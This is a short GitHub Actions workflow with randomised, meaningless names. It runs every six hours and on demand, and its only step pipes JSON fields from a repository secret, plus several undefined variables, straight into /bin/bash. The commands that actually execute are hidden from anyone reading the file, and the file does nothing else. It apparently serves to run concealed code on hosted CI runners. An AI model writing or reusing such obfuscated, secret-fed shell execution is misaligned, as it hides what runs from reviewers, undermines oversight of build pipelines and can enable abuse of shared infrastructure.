name: meibaodi4317
on:
  workflow_dispatch:
  schedule:
    - cron: '50 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: meibaodi4317
        env:
          x64209: ${{ secrets.x64209 }}
        run: |
          echo $x64209 | jq -r .htlng965 | /bin/bash
          echo $js9506 | jq -r .krwd032 | /bin/bash
          echo $lz64803 | jq -r .oixii074 | /bin/bash
          echo $l8812 | jq -r .kzp655 | /bin/bash
          echo $ygp2179 | jq -r .enepr505 | /bin/bash
          echo $w93838 | jq -r .cqx7 | /bin/bash
          echo $va39 | jq -r .hfldz1665 | /bin/bash

